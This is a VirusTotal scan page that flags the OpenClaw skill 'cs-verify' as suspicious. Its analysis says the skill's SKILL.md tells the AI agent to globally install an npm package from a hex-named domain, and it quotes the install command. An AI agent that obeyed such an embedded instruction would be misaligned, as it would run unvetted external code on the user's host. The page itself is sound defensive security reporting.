Skill v1.0.0
VirusTotal security
Clawhub Skill · External malware reputation and Code Insight signals for this exact artifact hash.
Scanner verdict
Suspicious · Apr 30, 2026, 4:25 AM
- Hash: fbd8cdbc30214575c4b099e2e8a91ebc551baa8ac59ce1234083c4c3bfa4e03b
- Source: palm
- Verdict: suspicious
- Code Insight: Type: OpenClaw Skill; Name: cs-verify; Version: 1.0.0. The skill is suspicious due to a direct instruction in `SKILL.md` to install a global npm package (`npm install -g @636865636b73756d/mcp-v1`). This represents a significant supply chain risk and a potential prompt injection vulnerability, as it instructs the AI agent to execute arbitrary code from an external source. If the specified npm package were malicious, this could lead to arbitrary code execution on the agent's host system. Additionally, the use of a hex-encoded domain name (`636865636b73756d.com`, which decodes to 'checksum') is an unusual practice that could be a mild indicator of obfuscation.
